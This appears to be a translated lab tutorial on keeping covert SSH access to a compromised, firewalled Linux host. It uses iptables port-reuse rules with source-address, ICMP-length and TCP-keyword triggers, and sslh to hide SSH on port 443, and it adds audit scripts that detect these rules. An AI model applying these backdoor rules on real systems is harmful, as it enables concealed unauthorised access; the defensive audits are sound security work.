iptables port reuse + hiding a port with sslh

This article explains how to use the iptables port-reuse technique on Linux, covering redirection by source address, an ICMP-based switch and a TCP-keyword switch to reach port 22. It also shows how to hide the SSH port with sslh so that HTTPS and SSH share port 443.

Environment:

Attacking host: Kali -- 192.168.218.135

Target host: RHEL8 -- 192.168.218.129

What is port reuse

Port reuse means that different applications communicate over the same port.

Scenario

The target is a Linux host whose firewall is strictly locked down and only lets traffic to port 80 in. We have a webshell on it and have obtained the SSH username and password, but we cannot connect remotely on port 22, so we have to reuse port 80 for the connection.

The idea is to do the port reuse with the PREROUTING chain of the nat table in Linux's iptables firewall, because the nat table's PREROUTING chain is processed before the routing decision.

Method one: port reuse by source address

Redirect all traffic from 192.168.218.135 to port 80 onto port 22

[root@localhost ~]# iptables -t nat -A PREROUTING -p tcp -s 192.168.218.135 --dport 80 -j REDIRECT --to-port 22

Connections to port 80 on the target will be redirected to port 22

┌──(root㉿kali)-[~]
└─# ssh root@192.168.218.129 -p 80
The authenticity of host '[192.168.218.129]:80 ([192.168.218.129]:80)' can't be established.
ED25519 key fingerprint is SHA256:Xyl+VWFSAPsWpBdCAW3pJSxbbajvRsoVvfqXavSa6fA.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.218.129]:80' (ED25519) to the list of known hosts.
root@192.168.218.129's password: 
Activate the web console with: systemctl enable --now cockpit.socket

Register this system with Red Hat Insights: insights-client --register
Create an account or view all your systems at https://red.ht/insights-dashboard
Last login: Thu Feb  2 09:10:41 2023 from 192.168.218.1
[root@localhost ~]# 

Done this way, all traffic to the target's port 80 is forwarded to port 22, so the web page will probably stop loading, haha. If we don't need to reach that HTTP service, that's fine. Suitable for connecting from a VPS.

Method two: an ICMP remote-control switch

Create the port-reuse chain

[root@localhost ~]# iptables -t nat -N LETMEIN

Create the port-reuse rule that forwards traffic to port 22

[root@localhost ~]# iptables -t nat -A LETMEIN -p tcp -j REDIRECT --to-port 22

Open switch: if an ICMP packet of length 1139 is received, add the source IP to the letmein list

[root@localhost ~]# iptables -t nat -A PREROUTING -p icmp --icmp-type 8 -m length --length 1139 -m recent --set --name letmein --rsource -j ACCEPT

Close switch: if an ICMP packet of length 1140 is received, remove the source IP from letmein

[root@localhost ~]# iptables -t nat -A PREROUTING -p icmp --icmp-type 8 -m length --length 1140 -m recent --name letmein --remove -j ACCEPT

If a SYN packet's source IP is in the letmein list, jump to the LETMEIN chain for processing; the list entry is valid for 3600 seconds

[root@localhost ~]# iptables -t nat -A PREROUTING -p tcp --dport 80 --syn -m recent --rcheck --seconds 3600 --name letmein --rsource -j LETMEIN

Enable reuse: send the target an ICMP packet with a payload of 1111 bytes (with the 20-byte IP header and the 8-byte ICMP header the actual length is 1139)

┌──(root㉿kali)-[~]
└─# ssh root@192.168.218.129
ssh: connect to host 192.168.218.129 port 22: Connection timed out

┌──(root㉿kali)-[~]
└─# ping -c 1 -s 1111 192.168.218.129
PING 192.168.218.129 (192.168.218.129) 1111(1139) bytes of data.
1119 bytes from 192.168.218.129: icmp_seq=1 ttl=64 time=0.826 ms

--- 192.168.218.129 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.826/0.826/0.826/0.000 ms

┌──(root㉿kali)-[~]
└─# ssh root@192.168.218.129 -p 80
The authenticity of host '[192.168.218.129]:80 ([192.168.218.129]:80)' can't be established.
ED25519 key fingerprint is SHA256:Xyl+VWFSAPsWpBdCAW3pJSxbbajvRsoVvfqXavSa6fA.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.218.129]:80' (ED25519) to the list of known hosts.
root@192.168.218.129's password: 
Activate the web console with: systemctl enable --now cockpit.socket

Register this system with Red Hat Insights: insights-client --register
Create an account or view all your systems at https://red.ht/insights-dashboard
Last login: Thu Feb  2 09:10:41 2023 from 192.168.218.1
[root@localhost ~]# 

Disable reuse: send the target an ICMP packet with a payload of 1112 bytes

┌──(root㉿kali)-[~]
└─# ping -c 1 -s 1112 192.168.218.129
PING 192.168.218.129 (192.168.218.129) 1112(1140) bytes of data.
1120 bytes from 192.168.218.129: icmp_seq=1 ttl=64 time=0.377 ms

--- 192.168.218.129 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.377/0.377/0.377/0.000 ms

The drawback of this method is that if the target is on an internal network we cannot ping it directly

Method three: a TCP remote-control switch

Use a keyword in the TCP payload as the remote switch; it does not matter if the target is on an internal network.

Create the port-reuse chain

[root@localhost ~]# iptables -t nat -N LETMEIN

Create the port-reuse rule that forwards traffic to port 22

[root@localhost ~]# iptables -t nat -A LETMEIN -p tcp -j REDIRECT --to-port 22

Open switch: if a TCP packet containing zhimakaimen is received, add the source IP to the letmein list

[root@localhost ~]# iptables -A INPUT -p tcp -m string --string 'zhimakaimen' --algo bm -m recent --set --name letmein --rsource -j ACCEPT

Close switch: if a TCP packet containing threathunterleaving is received, remove the source IP from the letmein list

[root@localhost ~]# iptables -A INPUT -p tcp -m string --string 'threathunterleaving' --algo bm -m recent --name letmein --remove -j ACCEPT

If a SYN packet's source IP is in the letmein list, jump to the LETMEIN chain for processing; the list entry is valid for 3600 seconds

[root@localhost ~]# iptables -t nat -A PREROUTING -p tcp --dport 80 --syn -m recent --rcheck --seconds 3600 --name letmein --rsource -j LETMEIN

Enable reuse; once enabled, traffic from this host to the target's port 80 is forwarded to the target's SSH

┌──(root㉿kali)-[~]
└─# echo zhimakaimen | socat - tcp:192.168.218.129:80

Disable reuse; port 80 goes back to normal

┌──(root㉿kali)-[~]
└─# echo threathunterleaving | socat - tcp:192.168.218.129:80
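Seen from the defender's side, all three methods leave the same traces in the rule set: a REDIRECT onto port 22, a `-m recent` list being set, cleared or checked, or a `-m string` payload trigger. The audit script below is an added example, not code from the original article: it reads `iptables-save` text on stdin and flags every rule that matches one of those patterns. The rules it runs against are a constructed sample modelled on the ones above, not output captured from the article's hosts. Two `iptables-save` quirks are accounted for: it prints `--to-ports` even when the rule was entered with `--to-port`, and it expands `--syn` to `--tcp-flags FIN,SYN,RST,ACK SYN`.

```shell
#!/bin/sh
# Audit iptables-save output for the port-reuse patterns discussed above.
# Added example; SAMPLE_RULES is constructed, not captured from a real host.
SAMPLE_RULES='*nat
:PREROUTING ACCEPT [0:0]
:LETMEIN - [0:0]
-A PREROUTING -s 192.168.218.135/32 -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 22
-A PREROUTING -p icmp -m icmp --icmp-type 8 -m length --length 1139 -m recent --set --name letmein --rsource -j ACCEPT
-A PREROUTING -p tcp -m tcp --dport 80 --tcp-flags FIN,SYN,RST,ACK SYN -m recent --rcheck --seconds 3600 --name letmein --rsource -j LETMEIN
-A LETMEIN -p tcp -j REDIRECT --to-ports 22
COMMIT
*filter
:INPUT ACCEPT [0:0]
-A INPUT -p tcp -m string --string "zhimakaimen" --algo bm --to 65535 -m recent --set --name letmein --rsource -j ACCEPT
-A INPUT -p tcp -m tcp --dport 80 -j ACCEPT
COMMIT'

# audit_rules: read iptables-save text on stdin and print one "reasons<TAB>rule"
# line per suspicious rule. Exit status 0 = nothing flagged, 1 = findings.
audit_rules() {
    found=0
    while IFS= read -r line; do
        case "$line" in
            -A*) ;;            # only rule lines matter; skip table headers, chain counters, COMMIT
            *) continue ;;
        esac
        reason=""
        # a) traffic for some other port redirected onto the SSH daemon
        case "$line" in
            *"-j REDIRECT --to-ports 22"*|*"-j REDIRECT --to-port 22"*)
                reason="redirect-to-ssh" ;;
        esac
        # b) the "switch": a per-source list being set/cleared, or gated on
        case "$line" in
            *"-m recent --set"*|*"-m recent --remove"*)
                reason="${reason:+$reason,}recent-switch" ;;
            *"-m recent --rcheck"*|*"-m recent --update"*)
                reason="${reason:+$reason,}recent-gate" ;;
        esac
        # c) a payload keyword used as the trigger (method three)
        case "$line" in
            *"-m string --string"*)
                reason="${reason:+$reason,}string-trigger" ;;
        esac
        if [ -n "$reason" ]; then
            printf '%s\t%s\n' "$reason" "$line"
            found=1
        fi
    done
    [ "$found" -eq 0 ]
}

# Stand-alone run against the constructed sample; on a live host use:
#   iptables-save | audit_rules
if printf '%s\n' "$SAMPLE_RULES" | audit_rules; then
    echo "no port-reuse rules found"
else
    echo "port-reuse rules present, review the lines above"
fi
```

On a real host run `iptables-save | audit_rules` (and the same for `ip6tables-save`); on systems that have moved to nftables, the equivalent is to look for `redirect to :22`, `string` and set-based matches in `nft list ruleset`. The `--to 65535` in the sample is what `iptables-save` emits for the string match's default search window and is not something the article's commands set.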

Hiding a port with sslh

Environment: Kali

Hiding the port

Port reuse can also be used to hide a port. The example here hides the SSH port while still allowing remote login over SSH: sslh lets HTTPS and SSH share the same port.

Install sslh

┌──(root㉿kali)-[~]
└─# apt-get install sslh -y

Configure sslh (the init defaults file, /etc/default/sslh on Debian-based systems such as Kali)

# Default options for sslh initscript
# sourced by /etc/init.d/sslh

# binary to use: forked (sslh) or single-thread (sslh-select) version
# systemd users: don't forget to modify /lib/systemd/system/sslh.service
DAEMON=/usr/sbin/sslh

DAEMON_OPTS="--user sslh --listen <change-me>:443 --ssh 127.0.0.1:22 --ssl 127.0.0.1:443 --pidfile /var/run/sslh/sslh.pid"

# change it to

DAEMON_OPTS="--user sslh --listen 0.0.0.0:443 --ssh 127.0.0.1:22 --ssl 127.0.0.1:443 --pidfile /var/run/sslh/sslh.pid"

With this setting sslh owns 0.0.0.0:443, so the real HTTPS server must be bound only to 127.0.0.1:443; if it still listens on all addresses, one of the two will fail to bind.

Start sslh

┌──(root㉿kali)-[~]
└─# systemctl enable sslh
Synchronizing state of sslh.service with SysV service script with /lib/systemd/systemd-sysv-install.
Executing: /lib/systemd/systemd-sysv-install enable sslh
Created symlink /etc/systemd/system/multi-user.target.wants/sslh.service → /lib/systemd/system/sslh.service.

Test: check that the sslh daemon is listening on 443

┌──(root㉿kali)-[~]
└─# ps -ef | grep sslh
sslh     1093888       1  0 12:13 ?        00:00:00 /usr/sbin/sslh --foreground --user sslh --listen 0.0.0.0 443 --ssh 127.0.0.1 22 --tls 127.0.0.1 443 --pidfile /var/run/sslh/sslh.pid
sslh     1093890 1093888  0 12:13 ?        00:00:00 /usr/sbin/sslh --foreground --user sslh --listen 0.0.0.0 443 --ssh 127.0.0.1 22 --tls 127.0.0.1 443 --pidfile /var/run/sslh/sslh.pid
root     1094656 1094630  0 12:15 pts/2    00:00:00 grep --color=auto sslh

Using it

[root@localhost ~]# ssh -p 443 root@192.168.218.135
The authenticity of host '[192.168.218.135]:443 ([192.168.218.135]:443)' can't be established.
ECDSA key fingerprint is SHA256:nWuRpxRY+eRmSjDLm/PTvsyEyFVbQMyQfegunja7Z4k.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.218.135]:443' (ECDSA) to the list of known hosts.
root@192.168.218.135's password: 
Linux kali 5.18.0-kali5-amd64 #1 SMP PREEMPT_DYNAMIC Debian 5.18.5-1kali6 (2022-07-07) x86_64

The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Feb  2 12:15:30 2023 from 192.168.218.1
┌──(root㉿kali)-[~]
└─# uname -srm
Linux 5.18.0-kali5-amd64 x86_64
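A host set up like this is easy to spot from the inside: in `ss -ltnp` port 443 is owned by sslh rather than a web server, and the real HTTPS daemon has been pushed to 127.0.0.1:443 to make room for it. The script below is an added example, not part of the article: it reads `ss -ltnp` output (the iproute2 column layout is assumed) on stdin and flags any 443 listener whose process is not in a small allowlist, plus a web server bound only to loopback, which usually means something else is fronting the port. The `ss` lines it runs against are a constructed sample, not output captured from the article's Kali host.

```shell
#!/bin/sh
# Audit "ss -ltnp" output for port 443 listeners that are not a web server.
# Added example; SAMPLE_SS is constructed in the iproute2 ss format.
SAMPLE_SS='State  Recv-Q Send-Q Local Address:Port  Peer Address:Port Process
LISTEN 0      4096         0.0.0.0:443        0.0.0.0:*     users:(("sslh",pid=1093888,fd=4))
LISTEN 0      511        127.0.0.1:443        0.0.0.0:*     users:(("nginx",pid=900,fd=6))
LISTEN 0      128          0.0.0.0:22         0.0.0.0:*     users:(("sshd",pid=700,fd=3))
LISTEN 0      511             [::]:80            [::]:*     users:(("nginx",pid=900,fd=7))'

# Processes expected to own 443 on this host; adjust for your environment.
WEB_ALLOWLIST="nginx apache2 httpd haproxy caddy"

# audit_https_listeners: read ss -ltnp text on stdin and print
# "local-address<TAB>process<TAB>finding" per suspicious 443 listener.
# Exit status 0 = clean, 1 = findings.
audit_https_listeners() {
    awk -v allow="$WEB_ALLOWLIST" '
    BEGIN { n = split(allow, a, " "); for (i = 1; i <= n; i++) ok[a[i]] = 1 }
    $1 == "LISTEN" {
        n = split($4, addr, ":"); port = addr[n]   # last ":"-field works for 0.0.0.0:443 and [::]:443
        if (port != "443") next
        proc = "unknown"
        # pull the first process name out of users:(("name",pid=...,fd=...))
        if (match($0, /users:\(\("[^"]+"/)) proc = substr($0, RSTART + 9, RLENGTH - 10)
        if (!(proc in ok)) {
            printf "%s\t%s\tnon-web process listening on 443\n", $4, proc; found = 1
        } else if ($4 ~ /^127\./ || $4 ~ /^\[::1\]:/) {
            printf "%s\t%s\tweb server bound to loopback only; something else fronts 443\n", $4, proc; found = 1
        }
    }
    END { exit found ? 1 : 0 }'
}

# Stand-alone run against the constructed sample; on a live host use:
#   ss -ltnp | audit_https_listeners
if printf '%s\n' "$SAMPLE_SS" | audit_https_listeners; then
    echo "port 443 is owned by an expected web server"
else
    echo "review the 443 listeners above"
fi
```

The allowlist is deliberately short; the point is that whatever answers on 443 should be a process you can name, and a multiplexer such as sslh (or a web server hiding on loopback behind one) stands out immediately. Pair this with the network view: a TLS-inspecting proxy or IDS will see a plaintext `SSH-2.0-` banner on a port where only a TLS ClientHello is expected.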